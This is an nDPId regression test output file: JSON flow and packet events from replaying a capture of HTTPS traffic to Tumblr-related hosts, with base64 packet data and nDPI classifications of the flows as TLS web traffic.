+00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1605292102678,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292102678,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvdQHZ9A6UTj6g1gBALxQp7AAABAQgKwt2UBql09U8="} +00631{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292103804,"flow_last_seen":1605292103804,"flow_idle_time":7560000,"flow_min_l4_payload_len":664,"flow_max_l4_payload_len":664,"flow_tot_l4_payload_len":664,"flow_avg_l4_payload_len":664,"midstream":1,"thread_ts_msec":1605292103804,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2620:116:800d:21:8c6e:cf2c:8d6:9fb5","src_port":41266,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+01390{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1605292103804,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":750,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":750,"pkt_l4_len":696,"thread_ts_msec":1605292103804,"pkt":"qtsDr8lk5EKm5WPyht1gDK9YArgGQCoBywEgSYsHmR3shSjf9ikmIAEWgA0AIYxuzywI1p+1oTIBu9ziFnW6Ce2BgBgB9Z0sAAABAQgKOMLyjsLdWyEXAwMCkwAAAAAAAAAEyttPIBHYl6fl6+wxakteQia67zuCx64sVbYiAEMKI1LRZB2ZjjRACezRfqMgcw8Wk8Ja+jFsbTh6PPGiWyRnZCafAJvoLbr\/QbtaCfYNT07cM7gv8MAYjagAz2\/uUXvHhHXYjVHplnNsW6sWSYWdjj7pK3cCYJyTWWk8KcaWVSPm5FJowuyKrEBg\/xvy4liO6V1qSsclVnGU5uOkFVqkiQyVPIXxSNOn3SjKKoV+GRhNjLSyOjDMf9ZrVDwqHvTDUwRZgkE5k6+v4Ngk9WrnV1ax1ubCqnHoIel2EK4gbfVvolwb83\/d3YNFV8lq1e+SHlYke+eJRKzjNIOw4b4Y36hRm5\/D2hks6V9vGkg6sSDzHRzniE1V4ce1mOtmNnefjf42UQc2HkOmWCkUVtMokEc166qSRXnlIooPlIQBw2b0stTzXYA2D5SN\/BALZmedX1SrmcVBJ4DrMf\/xHLEmuGaRjzLDgXIUB\/jHR45QJ7tyaECd\/R1pWTx+wCe3sS0fZlg4mB6GzVlIgWc0sXiXzk4KusTcJBlT6WCFzmZVXwOxGhq4mx\/Ar34HImolLoUFN3W4QPP1XuhLobsRn8+uu1UjAIOgrakq2nUZ7wxPjCRa6GR8HhsJaaSV8kQKCsWaODSJH8qsgcj27KMOqJKDEttTsUUejaBrXacD1ursBsQeG6kxeWCpc+pc+B6lF82QSaY+dqDc0x6adlVhzh25sn9xUc5gttNEqsRpcCwXleCFl5slq6Eo208ayh44XAy4\/3sSIcuuXZecriDdQNtCpH0D9WnZpbvC6F0uUd8YgEMLKpbVgkphXTjpgJPqNLHR1Jtsu8T0zduHUyA8I2rMdecA7vfO5m6vB6zg"} 
+00614{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292103804,"flow_last_seen":1605292103804,"flow_idle_time":7560000,"flow_min_l4_payload_len":644,"flow_max_l4_payload_len":644,"flow_tot_l4_payload_len":644,"flow_avg_l4_payload_len":644,"midstream":1,"thread_ts_msec":1605292103804,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::8fcc:d927","src_port":57286,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +01367{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1605292103804,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":730,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":730,"pkt_l4_len":676,"thread_ts_msec":1605292103804,"pkt":"qtsDr8lk5EKm5WPyht1gC36AAqQGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACPzNkn38YBu3OPNREQMJOagBgB9f9ZAAABAQgKI0OBn8LdXfIXAwMCf+a7XKOkxtVKJI04EV4D3mT6IiNw5ZdwpK\/ctvLby5AnUtCRp1wz9iXgvd8CBQl59Ed1wqXQfvbQcvgr9o4GGMRVH8BPyBiK9wAHxfoair+VUOV+cUyNlvDKwuPaUh\/47DlY44LAL0vv9eo4G0vPSmnyuohMST6JkC52HBED7hDgCc5lbkYutM3P7xGL1Z5MrmmzLXVyM4doUQOUayCKfyqRux1EiZDMeHsdoHvinwuW98Zns+5LqMwEKiz9\/ZA1Iu594xbEmeMockAnjj3HmV8YsDERU2TzTk3sWn0ZhKp12Rdx11cVSOnv1ddUqmkYpF6VPIBgfZdY0+3WEYNWwp9gOeZ1SPKEW1sZa\/MZbqxYU+ge0aUNP414S6YsDr4wWnXY\/hrIPt4hdVJid3p8HC+BYX8NVuisAelA3CsslL+yrlEZs\/QElNY2EIBitMqJSsgpwlduIlvcGoykV3DYfMjS3smQ0\/HaV+vGuY59BD+HYzkVJoRFJ5+AoB\/9kz8MrwgQrulG8+mXwGs2Tz+e0pxggDcl3iaCIQO5yUqOapIz\/jo8gXQAUjpsoKRzsKjRY\/OKBL3cj5DbujlngZrs+3yRDxMp\/A8kmIYDSMjyy21do9HW47erPa0WwNSepOx56UCCZyny26AleUHgV47LLX+Hh0DKxyVNOlUl474o9ZULR18pA1FtXPbynHGzdWF0peqNAJdGXSpxCnSDK+dkiaw9fmAlL\/EwEDJgbnaFqYBoa1wzZSNmUTmn9uQt7gG5UTLglNz7Gtm2hHwfzEK4uAknhpJOuKuRvE3auX9h725wqrVluU5SCPoyvKwHHRb0nBQK3ngxp6Haaq8pgOXbmw=="} 
+00554{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1605292103806,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":132,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":132,"pkt_l4_len":78,"thread_ts_msec":1605292103806,"pkt":"qtsDr8lk5EKm5WPyht1gDK9YAE4GQCoBywEgSYsHmR3shSjf9ikmIAEWgA0AIYxuzywI1p+1oTIBu9ziGQ26Ce2BgBgB9dicAAABAQgKOMLykMLdWyEXAwMAKQAAAAAAAAAF+jUU1elIEFUi9UepC3cLGnJUpit7lClItBx8Gs+U4NeE"} +00546{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1605292103807,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":125,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":125,"pkt_l4_len":71,"thread_ts_msec":1605292103807,"pkt":"qtsDr8lk5EKm5WPyht1gC36AAEcGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACPzNkn38YBu3OPN5UQMJOagBgB9TxfAAABAQgKI0OBosLdXfIXAwMAIkCDsSUDRd2gtpG1ie0hMvlOrf1SL9AYeSm49w1LAyMVmmo="} +00615{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":10,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292103810,"flow_last_seen":1605292103810,"flow_idle_time":7560000,"flow_min_l4_payload_len":382,"flow_max_l4_payload_len":382,"flow_tot_l4_payload_len":382,"flow_avg_l4_payload_len":382,"midstream":1,"thread_ts_msec":1605292103810,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::98c7:1593","src_port":42908,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+01015{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1605292103810,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":468,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":468,"pkt_l4_len":414,"thread_ts_msec":1605292103810,"pkt":"qtsDr8lk5EKm5WPyht1gCmLwAZ4GQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACYxxWTp5wBu7LtL87ROW\/JgBgB9bw+AAABAQgKM4zEpsLdXIMXAwMBeeuGCWF9Lb0Ci6TEBMXMSCRU5\/ujX\/oVXdGh+BNpGjYWczn5t9MnrcPf0zR8Rsvgek65i+QCA5M9xg538hLyui9336X\/wmAqUKW0ovcGHfVkBbInk26LgYglI5Td\/ssdGWORhYySPbJXLEFtu\/h1mXhj5XU6VyNxU9SBh\/8O12l+trWyWdbANDOIW9SbvtVRvHBRVZmz1ag3okb4Plbrh4Qi4B+G74t5h0\/qMYjiEuZ1+PtpSHBW9OPbPwwcOV4UZ67nf4PG8vUha9JOewT6Ihb4Yfc7EBAGx7VHrcHsn7dvXiF8gTt9bh55AJVAbM2ak8Yu6DoJnJsa+jvwTKddiAxdtJhT3E7fBmbothroFA49N5AzGnFsh4cxhtIWJBj0s+8J1Phi\/75LUnCD0lYbxKIDoOKf0QWR08Jx8MCXKqwRPsjDU42Fi\/URG4BOwibUPBjlxMt8e\/Bx1zwNGX2TOl3lRdKcwrnMTh58G0mfgl41Ox0e5b1fEr4M"} +00548{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1605292103811,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":125,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":125,"pkt_l4_len":71,"thread_ts_msec":1605292103811,"pkt":"qtsDr8lk5EKm5WPyht1gCmLwAEcGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACYxxWTp5wBu7LtMUzROW\/JgBgB9W6tAAABAQgKM4zEp8LdXIMXAwMAIinMMkxOhnFjQLjLSAyia+Ge5bjIivBAhB3nTGih+nlOG64="} 
+00555{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1605292103882,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":132,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":132,"pkt_l4_len":78,"thread_ts_msec":1605292103882,"pkt":"qtsDr8lk5EKm5WPyht1gDK9YAE4GQCoBywEgSYsHmR3shSjf9ikmIAEWgA0AIYxuzywI1p+1oTIBu9ziGQ26Ce2BgBgB9dhQAAABAQgKOMLy3MLdWyEXAwMAKQAAAAAAAAAF+jUU1elIEFUi9UepC3cLGnJUpit7lClItBx8Gs+U4NeE"} +00547{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1605292103890,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":125,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":125,"pkt_l4_len":71,"thread_ts_msec":1605292103890,"pkt":"qtsDr8lk5EKm5WPyht1gC36AAEcGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACPzNkn38YBu3OPN5UQMJOagBgB9TwMAAABAQgKI0OB9cLdXfIXAwMAIkCDsSUDRd2gtpG1ie0hMvlOrf1SL9AYeSm49w1LAyMVmmo="} +00548{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1605292103902,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":125,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":125,"pkt_l4_len":71,"thread_ts_msec":1605292103902,"pkt":"qtsDr8lk5EKm5WPyht1gCmLwAEcGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACYxxWTp5wBu7LtMUzROW\/JgBgB9W5SAAABAQgKM4zFAsLdXIMXAwMAIinMMkxOhnFjQLjLSAyia+Ge5bjIivBAhB3nTGih+nlOG64="} 
+00607{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":32,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292104650,"flow_last_seen":1605292104650,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292104650,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::68f4:2ac8","src_port":56782,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1605292104650,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292104650,"pkt":"qtsDr8lk5EKm5WPyht1gBEqMACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAABo9CrI3c4Bu\/+MQoWdXXNVgBAB9YSyAAABAQgKTYTpp8Lc6wE="} +00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1605292104716,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292104716,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPQBk\/5sAAAAAAAAAAGj0KsgqAcsBIEmLB5kd7IUo3\/YpAbvdzp1dc1X\/jEKGgBAMSBTRAAABAQgKwt2b\/U1+nj4="} 
+00674{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":57,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1605292103810,"flow_last_seen":1605292105112,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":12081,"flow_avg_l4_payload_len":377,"midstream":1,"thread_ts_msec":1605292105112,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::98c7:1593","src_port":42908,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00675{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":57,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1605292103810,"flow_last_seen":1605292105112,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":12081,"flow_avg_l4_payload_len":377,"midstream":1,"thread_ts_msec":1605292105112,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::98c7:1593","src_port":42908,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00615{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":87,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292105170,"flow_last_seen":1605292105170,"flow_idle_time":7560000,"flow_min_l4_payload_len":160,"flow_max_l4_payload_len":160,"flow_tot_l4_payload_len":160,"flow_avg_l4_payload_len":160,"midstream":1,"thread_ts_msec":1605292105170,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d28","src_port":43420,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00716{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":87,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1605292105170,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":246,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":246,"pkt_l4_len":192,"thread_ts_msec":1605292105170,"pkt":"qtsDr8lk5EKm5WPyht1gDdvHAMAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAADAAE0oqZwBuzRq\/HZTRuvUgBgSELhfAAABAQgKdG+lysLdLW8XAwMAm7+VUv5v3n1cEKhvA7Obmk7hW69laavu9OZNOdP5v2aiE9LYEKQeHffn7vm6VstuW5LB+GPd1bdCCYxPrQ8cpXXvSrRBde7Ubgvulsw\/eGF6vJKgoYXL5h04lY18ojPm\/cV9tUPretg64t\/hG52\/jXKkQ9+5e1GR1KuJgn1MWQ\/97vN82J\/Jt388ivkqQMfP0T\/jvMqs33Elwytq"} +00699{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":88,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1605292105170,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":237,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":237,"pkt_l4_len":183,"thread_ts_msec":1605292105170,"pkt":"qtsDr8lk5EKm5WPyht1gDdvHALcGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAADAAE0oqZwBuzRq\/RZTRuvUgBgSEKKhAAABAQgKdG+ly8LdLW8XAwMAazorJ+v8Qql\/1vWfAai2gkZCI3DTL5oADrcU2MSE9kWZdYS8Jqpk4fHfL5KS3jLCf57oTjL53SDsaGk+gIvtoan6S0MuUK39MyCSYP90lEM7cfvMMDv9MYZwBU7ADMu7jSPLRoIxvW6l0Cl8FwMDACLudklu9KmRe2M4B\/MpTRVuBpiUQvjz3VbQML7h4xLHHM4W"} 
+00615{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":89,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292105171,"flow_last_seen":1605292105171,"flow_idle_time":7560000,"flow_min_l4_payload_len":112,"flow_max_l4_payload_len":112,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":112,"midstream":1,"thread_ts_msec":1605292105171,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d28","src_port":43434,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00648{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":89,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1605292105171,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":198,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":198,"pkt_l4_len":144,"thread_ts_msec":1605292105171,"pkt":"qtsDr8lk5EKm5WPyht1gCnTDAJAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAADAAE0oqaoBuwynxfpsKg54gBgd\/fuUAAABAQgKdG+ly8LdWR0XAwMAa1HIP\/vnAAogIw4J2B2TkEHONIFMeD5XyAVKi4Q2Vue2Mstte\/aj9aBEGnaC\/XLTSleNDPxB5FKFlYuKlZTTvSjcjRkZVdPHhikw9Xf3PTuX4sNc4A4aMrxDB+2xDdlSgUdvbOv4DPatYzp8"} +00551{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":90,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1605292105171,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":125,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":125,"pkt_l4_len":71,"thread_ts_msec":1605292105171,"pkt":"qtsDr8lk5EKm5WPyht1gCnTDAEcGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAADAAE0oqaoBuwynxmpsKg54gBgd\/YTsAAABAQgKdG+lzMLdWR0XAwMAIlHp65gwK7PBPS\/ZXxVrtwWRv5u\/D1Oka\/7+0BiFD1N3mso="} 
+00647{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":91,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1605292105176,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":197,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":197,"pkt_l4_len":143,"thread_ts_msec":1605292105176,"pkt":"qtsDr8lk5EKm5WPyht1gCnTDAI8GQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAADAAE0oqaoBuwynxpFsKg54gBgd\/f4EAAABAQgKdG+l0cLdWR0XAwMAau+1WhRe96DKEz4O2DiVS\/91xsnWseh+6lrx3LgaqNmDXwRm1lqF7AcLtXkaV8D99qMpoGwTJnk5i4\/A5jdKnihSC+92twzKrr9YRFj27xUmeqz0tGED25O9+HkuuOkV2W5IN6Z8o+lbpTM="} +00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":93,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1605292105195,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292105195,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPQBk\/5sAAAAAAAAAAMAATSgqAcsBIEmLB5kd7IUo3\/YpAbupnFNG69Q0av0WgBAMvoDtAAABAQgKwt2d3XRvpco="} +00627{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":95,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292105197,"flow_last_seen":1605292105197,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605292105197,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2606:2800:135:155a:23ba:b2a:25ff:122d","src_port":58380,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":95,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1605292105197,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605292105197,"pkt":"qtsDr8lk5EKm5WPyht1gCsuaACgGQCoBywEgSYsHmR3shSjf9ikmBigAATUVWiO6Cyol\/xIt5AwBu6fu9OYAAAAAoAL9IHL6AAACBAWgBAIIClFT82IAAAAAAQMDBw=="} +00675{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":128,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1605292105170,"flow_last_seen":1605292105221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":12369,"flow_avg_l4_payload_len":386,"midstream":1,"thread_ts_msec":1605292105221,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d28","src_port":43420,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00676{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":128,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1605292105170,"flow_last_seen":1605292105221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":12369,"flow_avg_l4_payload_len":386,"midstream":1,"thread_ts_msec":1605292105221,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d28","src_port":43420,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
+00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":146,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1605292105230,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605292105230,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSYGKAABNRVaI7oLKiX\/Ei0qAcsBIEmLB5kd7IUo3\/YpAbvkDMLhfl2n7vTnoBJXgHalAAACBAV4AQMDAwQCCArC3Z3zUVPzYg=="} +00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":150,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1605292105230,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292105230,"pkt":"qtsDr8lk5EKm5WPyht1gCsuaACAGQCoBywEgSYsHmR3shSjf9ikmBigAATUVWiO6Cyol\/xIt5AwBu6fu9OfC4X5egBAB+\/qVAAABAQgKUVPzg8LdnfM="} +00955{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":154,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605292105197,"flow_last_seen":1605292105231,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605292105231,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2606:2800:135:155a:23ba:b2a:25ff:122d","src_port":58380,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"consent.cmp.oath.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00675{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":158,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1605292105171,"flow_last_seen":1605292105231,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":17162,"flow_avg_l4_payload_len":536,"midstream":1,"thread_ts_msec":1605292105231,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d28","src_port":43434,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 